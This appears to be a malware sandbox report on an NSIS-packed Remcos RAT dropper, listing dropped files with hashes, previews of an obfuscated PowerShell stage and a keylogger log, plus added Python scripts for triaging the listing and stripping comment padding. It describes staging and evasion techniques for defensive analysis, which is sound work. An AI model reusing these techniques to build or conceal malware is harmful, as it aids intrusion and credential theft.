.V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):3.2378997863377457
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIiRkXkkXfkuguW20QA0QG0Qgc0QXb0Q20QQ76g8Xu4szeuzSzbxGQI5zmXspt:p8le+uauyoeyOkNB
                                                    MD5:9D7CC7C521287E77EF8CAE8C709F00FD
                                                    SHA1:8B3E6277CC23A0091B4CF719A4BDBFAD7966265C
                                                    SHA-256:803C36F68B6585EF11ADE2CBB0191BCFDADFF394543141F8B8AC9807E353E2E1
                                                    SHA-512:06DF2420D492D26D726E019996D87C40C631BE47A041E6B6BA5FA85ECA7E7DF32D3E11CA88C7839314645294BD76545E79B755255900D54FD6CEB4965764DF89
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .3.0.2.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.6.0.7.6.1. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):3.2401759460630677
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIiekXkkXfkuguWn0QB0Q70Qgv0QXc0QJ0QmGHgjXvZEszeuzSzbxGQI5UhmLo:pzle+uxhioeyOkNKB
                                                    MD5:B7BC3E6AAE0C2DA0AFA97894366FB5CB
                                                    SHA1:E3FEE12B28A155914CF91270D2208E57AE0CEF78
                                                    SHA-256:495FF0A5164BF95EDF00FC74996864011FA2189E6CD0BF8611032034661E8D38
                                                    SHA-512:98F0F2A957CF0264BCC7EF0EC1F2A5B5173C357A2F5D4F9240C635F1B04ECECBDDC98C9AF12E5EF6892D3A6F04067543CC189597DD872C074CDD04598EECD9ED
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.7.6. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.6.7.8.9.0.0. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):940057
                                                    Entropy (8bit):4.055092724783294
                                                    Encrypted:false
                                                    SSDEEP:6144:JLaw2Ho20R14B5iK1jqkahRmN7N8AMKLuR5L2ZYAC4iNGZwWbEvjQrLHlG:9awOoVmnZN0OoYO5L6C4ow/P
                                                    MD5:BFAAF0E666558EAA228C47A3FC3684A6
                                                    SHA1:A83B5238D4C56AE56451BF54633135C7309A30ED
                                                    SHA-256:747727FED570818BA30C9955F47BBB2CD7FD46F51CA4AE5EA61544B1CD61B2B2
                                                    SHA-512:A5468227DE263DF6EB1F8F83B146C48848A364BA2035A29E3BDCB67D0074BB63E8373E526811DC3A486914BA06F1C7968BD5DF738FAA206B648E133E16C1BD4E
                                                    Malicious:false
                                                    Preview:.)......,...................p............(.......)..........................................................................................................................................................................................................................................G...[...........O...j...............................................................................................................................................8.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:ASCII text, with very long lines (306), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):477
                                                    Entropy (8bit):4.2758031658111015
                                                    Encrypted:false
                                                    SSDEEP:12:/Sk0C6TMP4eCAEzbDll7gFV0peuMUkWOKKgzRxRkhrfEiMvct:/S5TMPzDEzbplEFV0peuMZJszRYu0t
                                                    MD5:292E116B3003FAD8B824FF54B5222693
                                                    SHA1:D3BE81A8A5404BE699A6A59B316D0E239F60F305
                                                    SHA-256:A7AE5BDF2822C1941C09A9D3535F5B04934D914C16FED87BE1369EC3190ADAF7
                                                    SHA-512:7DC7D2CEE6F5EE002C0049E45E5D58E02DA99AF40CCA7D81FC97853FA463404C6FA6425480DFA954E951B29353D69F81577237D94ECB24D9E06E8287223C9FD2
                                                    Malicious:false
                                                    Preview:sakramentet monicker organisten edderdunsdyne unnipped bolsmnds dysfunctional parrotism..camelopardalis overbeskftigelsen indvirkningerne mooley tornystrenes bovlstrup..brinkmanship stenbroernes efteruddanelseskurser,matmaking fibroadenia sharezer gaseosity vaporiferous falks.underskriftindsmlings skovmaars absurd simulering cerebrotonic harmonisations dmpnings.dioptometre dowser annullwlr overgirded triplicity rosenbedet glorificeredes glsningerne lombrosian mttere waag..
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.000122 (a libmagic signature hit on a null-padded buffer: with entropy 0.15 over 100609 bytes this is padding, not thermal-camera data)
                                                    Category:dropped
                                                    Size (bytes):100609
                                                    Entropy (8bit):0.15377383202349873
                                                    Encrypted:false
                                                    SSDEEP:48:WNo92FmrnJoUPwwYJ+LW//XVWZJNBD9dGG0E:WNe5oUPwwi+LW/wZJNBBoE
                                                    MD5:C3F66924A836D18C62CD39BCA76A4686
                                                    SHA1:35F86E33B8EFA49B17C0EE1E11A82829D93662DD
                                                    SHA-256:A99DEBA735D90BA79B85356E47CFCBCBD959BDEA538EBD9126715730EAEFE08A
                                                    SHA-512:EF16C0BEB61ECA149BD37AC5D7560CE6D1471849304DA2A25EF3B38C69656AB2F3FA2425A5CB82C1AD2B06F90521EE31843A1D4E0E49E9BE6D41B7F8D8970A9E
                                                    Malicious:false
                                                    Preview:...........................................................................................................................................................................................9................................................................................................................................................................................................................................................................................................................A........................................................................................................................................7..............................................................h......u....................................................................................................................................................................Y.......................................................................................................................................
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):169841
                                                    Entropy (8bit):0.16017172270085472
                                                    Encrypted:false
                                                    SSDEEP:96:38f7y3AcZmvLQEZVVMeAlqKNV2Zp3yHstq:o7y3AcZmsEZVVMeAlqRp3y+q
                                                    MD5:8AFCC792B0E9516C3B43CCEBEE7EACC1
                                                    SHA1:8C4DDCEA5941F087B85B535FF08AE9ECFFD7607E
                                                    SHA-256:944F29A96DF1077575C114A18F04CF233FD2E6E82BB083A6D7D85CDAF5C7E613
                                                    SHA-512:3FFB0508E68FB675C758E55160FA957EE234A4FC85515C376317FF2641D408433AC295EB628F7155801B1EAF50F4B04A24A3DE14C1C2A43A2BE506A5500A4EA7
                                                    Malicious:false
                                                    Preview:................................................................@...............................x..............................................................................................................................................X...........................................................................................................................A....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%.......................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):501952
                                                    Entropy (8bit):7.515756337598642
                                                    Encrypted:false
                                                    SSDEEP:12288:InPdsC9RjSkcPzD3OH5/AOC0M2WJBbM78jUiMggEsKw6:APdZWkc/3cmOXSI8IiM1Kt
                                                    MD5:DA38292DF7F99C9CF99629E84D934BD6
                                                    SHA1:54BA9688E3E1159F1E1A43D1716F78A0C33665BA
                                                    SHA-256:8950C80B785FE1DCFF01DBB074A337102BF8C76A06314287D4686501617171F3
                                                    SHA-512:BDC88BFCCFE6402C1C45FF68C4860DC7260F54BE3104027AB632516140BF4CEAE9F4382340C974C3D453C115A0C50E4CD6AD59C79DE217274A3ADAE83DCF54BA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                    • Antivirus: Virustotal, Detection: 14%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..................................u....@......................................................... ................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...@...............................rsrc............ ..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Preview:[ZoneTransfer]....ZoneId=0
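The three records above written by powershell.exe are the ones worth reading together: a 501952-byte NSIS PE flagged malicious, a Zone.Identifier stream with ZoneId=0 (Local Machine zone, so no Mark-of-the-Web), and, further down, large low-entropy buffers that libmagic mislabels. The following script is an added example, not Joe Sandbox code: it parses the flat Key:Value records as they appear in this report and applies those checks. The submitted sample's SHA-256 is an input the analyst supplies from the report header; here it is set to the dropped PE's own hash so the self-copy rule fires. The listing embedded below is constructed from records on this page with long fields trimmed.

```python
"""Triage a Joe Sandbox 'Dropped Files' listing (added example, not Joe Sandbox code).

Records are the flat 'Key:Value' lines shown in the report; a new record begins
at each 'Process:' line, and '•' bullets belong to the preceding record.
"""
import re

# Constructed sample: three records copied from the listing above, long fields trimmed.
SAMPLE_LISTING = r"""
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
    Size (bytes):501952
    Entropy (8bit):7.515756337598642
    SHA-256:8950C80B785FE1DCFF01DBB074A337102BF8C76A06314287D4686501617171F3
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 11%
    • Antivirus: Virustotal, Detection: 14%
    Preview:MZ......................@...
    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with CRLF line terminators
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    Malicious:false
    Preview:[ZoneTransfer]....ZoneId=0
    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.000122
    Size (bytes):100609
    Entropy (8bit):0.15377383202349873
    SHA-256:A99DEBA735D90BA79B85356E47CFCBCBD959BDEA538EBD9126715730EAEFE08A
    Malicious:false
    Preview:.......................
"""

KNOWN_KEYS = {"Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
              "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512",
              "Malicious", "Antivirus", "Yara Hits", "Preview"}
ZONE_RE = re.compile(r"\[ZoneTransfer\].*?ZoneId=(\d)")
DETECTION_RE = re.compile(r"Antivirus: (\w+), Detection: (\d+)%")


def parse_dropped_files(text):
    """Return one dict per record; lines that are not known fields (preview spill) are skipped."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•") and current is not None:
            current.setdefault("Detections", []).append(line.lstrip("• "))
            continue
        key, sep, value = line.partition(":")   # split at the first colon only
        if not sep or key not in KNOWN_KEYS:
            continue
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value.strip()
    return records


def triage(records, submitted_sha256):
    """Map each record's SHA-256 (lower-case) to the triage notes it earns."""
    findings = {}
    for rec in records:
        sha256 = rec.get("SHA-256", "").lower()
        proc = rec.get("Process", "").rsplit("\\", 1)[-1]
        ftype = rec.get("File Type", "")
        size = int(rec.get("Size (bytes)", "0"))
        entropy = float(rec.get("Entropy (8bit)", "0"))
        notes = []
        if sha256 and sha256 == submitted_sha256.lower():
            notes.append("byte-identical copy of the submitted sample (staging/persistence copy)")
        if ftype.startswith("PE32"):
            if rec.get("Malicious") == "true":
                notes.append("malicious PE written by " + proc)
            if proc.lower() == "powershell.exe":
                notes.append("PE dropped by PowerShell: script-driven staging, not an installer extract")
        for det in rec.get("Detections", []):
            m = DETECTION_RE.search(det)
            if m:
                notes.append("%s flags it at %s%%" % (m.group(1), m.group(2)))
        if size >= 50_000 and entropy < 0.5:
            # libmagic matches a few leading bytes; a near-zero buffer can hit odd signatures
            notes.append("near-empty buffer (entropy %.2f over %d bytes); libmagic's '%s' "
                         "is a signature hit on null padding, not a real format"
                         % (entropy, size, ftype.split(",")[0]))
        m = ZONE_RE.search(rec.get("Preview", ""))
        if m:
            note = "Zone.Identifier with ZoneId=" + m.group(1)
            if m.group(1) == "0":
                note += (" (Local Machine zone: no Mark-of-the-Web, so no "
                         "SmartScreen/Protected View on the paired file)")
            notes.append(note)
        if notes:
            findings[sha256] = notes
    return findings


if __name__ == "__main__":
    for sha, notes in triage(parse_dropped_files(SAMPLE_LISTING),
                             "8950C80B785FE1DCFF01DBB074A337102BF8C76A06314287D4686501617171F3").items():
        print(sha[:16], *notes, sep="\n  ")
```

The parser splits each line at its first colon only, which is what keeps the `calibration: offset` inside the File Type field and the `ZoneId=0` inside the preview; anything that is not a known field name is treated as preview spill and dropped.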
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):276710
                                                    Entropy (8bit):0.15969803423381917
                                                    Encrypted:false
                                                    SSDEEP:96:Y8nH0PyxSEySqWNnJryMrPle1okR1pVK+W7t49hTc:Y8H0KxrqWxNPle1nR7VKB7t49hY
                                                    MD5:B85779B542E03E21F26DB4C58587204F
                                                    SHA1:BB0BD37AEEC3339DBD8A1BBE8E879549C84E29A0
                                                    SHA-256:BB1827D75495F93A729C94844AD2E17E9E211AEBEE5B6BB8574314C455BA95E6
                                                    SHA-512:9F894F912B040282554A2F8A67CFDDEC7D9AC30739BF4E04E2EE18D440F3287CFBEF45E7B8E7D3F95D846330B457CE5C1FFAB423CB7E30F014EAD29252434FEA
                                                    Malicious:false
                                                    Preview:......................................................................2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:ASCII text, with very long lines (58092), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):58092
                                                    Entropy (8bit):5.365528263478254
                                                    Encrypted:false
                                                    SSDEEP:1536:J0dPTiZl3LdPd7SY7T7EpBjQPns5rYLLMb8luJo3:J0tiZjF7XnEvjQPnfLLa8lGo3
                                                    MD5:BE83BBAAAA149CEA1CE61E16AB717EFF
                                                    SHA1:D8EDCA29EAD382CA55D825FC8A69F916680995D6
                                                    SHA-256:B0352970DB8585598F3EA0E38A3E353BD3169D6C8BFFBC43257C1DCBEEF2755B
                                                    SHA-512:D255EDA10EE7B545B169803A521E53883E607F699678A0739E80683A0FFE056048A9E06F458697B350A62812CA736AD36AB42877AB5DA311915AF23FC6072831
                                                    Malicious:true
                                                    Preview:$Flelsernes=$Genforsikredeerapningerne;<#Anales Bjergkders Hydrocorisae #><#Tredjeverdenslands Unperceivable Bustens Folketroens Prioriteternes Emfasernes #><#Deployed Hairweave Snobberi Sverige Nonrecital Hjhus Politikbegreb #><#Equinecessary Diskussionsklubben Defmrkerne Dommervagtsmdernes Pueraria Neje Frstehaandsforklaring #><#Mobulidae hoosierese Basiventral #><#Flyvermekanikeres Hlidhskjalf Archpatron Revaluerer Tortillaer #><#Lansens Unpasted Sippenippet #><#Kurtiser paediatrics Micrurgies Exograph #><#Naut Virtuosa Rubbertens Kymographic Aarhusianerne Gotfreds Plyndrede #><#Humist Leaped Singapore pushout #><#Affdtes Skamslog Subanconeal Brystfinnens Septship Abvolts Bistandshjlps #><#Illimitedness Glutaminic Subfumose Dolken Efterlever Sedimenternes Philatelists #><#Vehefte Jordbrenes Histoid Besmittede #><#Crosshatches Uncontrolling Rrflangen #><#Bismarck distributivt Akvarieplante Freeholdership Dipsomania Imprevisibility Lagertilgange #><#baserede Beroerte Epizoicide Harrov
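The dropped script above is a single 58092-byte line in which real statements are separated by runs of `<# ... #>` block comments filled with dictionary words. Because there are no line terminators, a `#` line comment would swallow everything after it, so block comments are the only place the junk can go, and stripping them is the first deobfuscation step. The following is an added example, not code from the sample or the report: the input is constructed from the first statement of the preview, two of its comments, one invented statement (`$Flelsernes;`) and a truncated trailing comment to exercise the unterminated case.

```python
"""Strip <# ... #> comment stuffing from a one-line PowerShell stage (added example)."""
import re

# Constructed sample modelled on the preview: first real statement from the preview,
# junk block comments, one invented statement, and an unterminated comment (the
# preview was cut off mid-comment).
OBFUSCATED = (
    "$Flelsernes=$Genforsikredeerapningerne;"
    "<#Anales Bjergkders Hydrocorisae #>"
    "<#Tredjeverdenslands Unperceivable Bustens Folketroens #>"
    "$Flelsernes;"
    "<#Mobulidae hoosierese Basiventral"
)

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)   # non-greedy: stop at the first #>


def strip_block_comments(src):
    """Return (code, comments_removed, junk_ratio).

    Caveat: a regex does not know about string literals, so a '<#' inside a quoted
    string would be removed as well. For a script you intend to keep analysing,
    tokenize it with PowerShell's own
    [System.Management.Automation.PSParser]::Tokenize and drop Comment tokens.
    """
    code, removed = BLOCK_COMMENT.subn("", src)
    cut = code.find("<#")
    if cut != -1:            # an unterminated <# comments out the rest of the file
        code = code[:cut]
        removed += 1
    code = code.strip()
    junk_ratio = 1 - len(code) / len(src) if src else 0.0
    return code, removed, junk_ratio


def statements(code):
    """Split the cleaned one-liner on ';' (adequate for this stage's flat statement list)."""
    return [s.strip() for s in code.split(";") if s.strip()]


if __name__ == "__main__":
    code, removed, ratio = strip_block_comments(OBFUSCATED)
    print("removed %d comments, %.0f%% of the input was junk" % (removed, ratio * 100))
    for stmt in statements(code):
        print(" ", stmt)
```

The junk ratio is a cheap triage signal on its own: a script where most of the bytes disappear once comments are removed is worth a closer look before any of it is executed.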
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):323646
                                                    Entropy (8bit):7.6655796606128055
                                                    Encrypted:false
                                                    SSDEEP:6144:Jaw2Ho20R14B5iK1jqkahRmN7N8AMKLuR5L2ZYAC4iNGx:JawOoVmnZN0OoYO5L6C4oo
                                                    MD5:2928ADC276204326D097DAC0D8911E5E
                                                    SHA1:DF9FC8A3CA73106F40AA421C62650FD17B08B2E4
                                                    SHA-256:2143ACF1161D82C172C9EE492680223F8B036048882501F7E0FCDC15FB4C840F
                                                    SHA-512:6E3C8989875D8EA8A51AFEC379EB6E7B333BF33E89804B47D0E480D3E3266C21A704F31D5B82A8BA4C392FD771566BCCE156EA0D65DEF2088DCB21F3BCF70E88
                                                    Malicious:false
                                                    Preview:...........""......ZZ.................:........&&&..."..........:::..K.FFFFFFFFF.....................................................:.....AAAAAA.......&.&.].....::::........-.............................T.DD...l..eeee.....K.....................88888...........zzz...G........................BB........................^......:.***.............mm........7.{{{.......2....-.b..................`.....I.......88.......<................................].----..........YYY...E.....-..44..............+..l.....3333......................y......VVV..............................}.........'...........^^^........ .................................999.....3....||...8..........ww........................................................GGG....@........~~~~..................nnn.//.......W............i.........*........KKKKKK./...]]]...a............%...4........z..[.).........ss..............................4.rr..yy...........................................uu.......z.........V.?.@.z.**..................::....
                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):246
                                                    Entropy (8bit):3.35313624379277
                                                    Encrypted:false
                                                    SSDEEP:3:rhlKlFelJtZl5JWRal2Jl+7R0DAlBG4+LilXIkqoojklovDl6ALilXIkqoojkloC:6lsJtb5YcIeeDAlKe5q1gWAAe5q1gWAv
                                                    MD5:EBD482641F665871B45BFBA1668FD1B8
                                                    SHA1:5136D26E78B8A37AB1713287A4DB8663F528B71A
                                                    SHA-256:98F14C0DF51118C2EE32D7E6719ECCF09574471B22B33AE3353C5E08E36A10F5
                                                    SHA-512:5C7422C820892DAC9367ECE067BF989897C9D073D5AD0794E87F7EC2742C1FCC3014440BBD3D8DAEE607880E0DDBAA262C7901F53CE0129E79382F74E3423DDA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\fvberms.dat, Author: Joe Security
                                                    Preview:....[.2.0.2.4./.0.5./.0.3. .0.9.:.4.3.:.5.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.466140158363459
                                                    Encrypted:false
                                                    SSDEEP:6144:fIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSby:QXD94zWlLZMM6YFHh+y
                                                    MD5:DC7D5797092AC0E59E0456425999CF68
                                                    SHA1:C77A1CA2DE283A4C0C8DBBC13EB82F103F4052BE
                                                    SHA-256:BAB57829C7C4B9BC1676278BF03834790C328CFDBF65DA80404ABAE45C4042DA
                                                    SHA-512:C6B6B2C879E08F6ACF1B831E4AE8CBBF579FBB0CE79B21D45637E7208D5A6F9D488A7BD4C11CE6ACA6459D3950335CF4CA83A5331AAD72DF9DB7EE61B3583A3F
                                                    Malicious:false
                                                    Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..-.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.515756337598642
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File size:501'952 bytes
                                                    MD5:da38292df7f99c9cf99629e84d934bd6
                                                    SHA1:54ba9688e3e1159f1e1a43d1716f78a0c33665ba
                                                    SHA256:8950c80b785fe1dcff01dbb074a337102bf8c76a06314287d4686501617171f3
                                                    SHA512:bdc88bfccfe6402c1c45ff68c4860dc7260f54be3104027ab632516140bf4ceae9f4382340c974c3d453c115a0c50e4cd6ad59c79de217274a3adae83dcf54ba
                                                    SSDEEP:12288:InPdsC9RjSkcPzD3OH5/AOC0M2WJBbM78jUiMggEsKw6:APdZWkc/3cmOXSI8IiM1Kt
                                                    TLSH:7DB4128676A8C062CC920A34CE79E7FE89AC5C14EA990B4F4760FFCF3D727195718196
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                    Icon Hash:2951ea4c6d0f968e
                                                    Entrypoint:0x403645
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                    Signature Valid:false
                                                    Signature Issuer:E=Kollaboratrer@Nonlister.Te, O=Eddikebrygger, OU="Cinquefoil Grundtvigsk Mehari ", CN=Eddikebrygger, L=Burgdorf, S=Niedersachsen, C=DE
